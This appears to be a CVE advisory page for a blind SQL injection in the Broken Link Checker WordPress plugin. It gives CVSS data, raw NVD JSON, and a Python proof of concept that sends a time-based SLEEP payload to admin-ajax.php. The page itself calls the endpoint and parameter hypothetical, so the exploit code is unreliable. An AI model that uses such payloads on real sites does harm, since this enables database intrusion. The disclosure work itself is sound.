Security Vulnerability Report
中文
CVE-2026-39466 CVSS 7.6 HIGH

CVE-2026-39466

Published: 2026-04-08 09:16:22
Last Modified: 2026-04-24 18:08:35

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPMU DEV - Your All-in-One WordPress Platform Broken Link Checker broken-link-checker allows Blind SQL Injection.This issue affects Broken Link Checker: from n/a through <= 2.4.7.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Broken Link Checker <= 2.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_sqli(target_url, admin_cookie): """ PoC for CVE-2026-39466: Blind SQL Injection in Broken Link Checker Requires High Privileges (Admin). """ # Target endpoint (hypothetical based on plugin structure) endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload extracting database version using time-based blind injection # Note: The exact parameter name needs to be identified via source code review payload = { "action": "blc_some_action", "link_id": "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)" } headers = { "Cookie": admin_cookie, "User-Agent": "CVE-2026-39466-Scanner" } try: response = requests.post(endpoint, data=payload, headers=headers, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response delayed.") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"[!] Error: {e}") # Usage # exploit_sqli("http://target-wordpress.com", "wordpress_logged_in_xxx=...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39466", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:21.830", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPMU DEV - Your All-in-One WordPress Platform Broken Link Checker broken-link-checker allows Blind SQL Injection.This issue affects Broken Link Checker: from n/a through <= 2.4.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/broken-link-checker/vulnerability/wordpress-broken-link-checker-plugin-2-4-7-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}